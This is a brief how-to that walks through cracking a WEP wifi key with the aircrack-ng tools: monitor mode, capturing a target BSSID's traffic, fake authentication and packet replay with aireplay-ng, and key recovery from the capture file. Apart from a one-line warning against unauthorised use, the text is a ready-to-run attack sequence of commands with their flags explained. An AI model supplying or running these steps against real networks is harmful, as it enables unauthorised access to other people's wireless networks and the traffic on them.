Don't crack any wifi router without authorization; otherwise, you will be put into the jail.
Step 1 :
airmon-ng
The result will be something like :
Interface Chipset Driver
wlan0 Intel 5100 iwlagn - [phy0]
Step 2 :
airmon-ng start wlan0
Step 3 :
airodump-ng mon0
Press "
Ctrl+c
" to break the program.Step 4 :
airodump-ng -c 6 -w wepcrack --bssid 99:88:77:66:55:44 mon0
*where -c is the channel
-w is the file to be written
--bssid is the BSSID
Step 5 :
open another terminal.
aireplay-ng -1 0 -a 99:88:77:66:55:44 mon0
*where -a is BSSID
The terminal is keeping running.
Step 6 :
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b 99:88:77:66:55:44 mon0
*where -c is client's MAC address (STATION)
-b is BSSID
When asking "
Use this packet?
", answer "y
".Step 7 :
open another terminal.
aircrack-ng wepcrack*.cap
That's all! See you.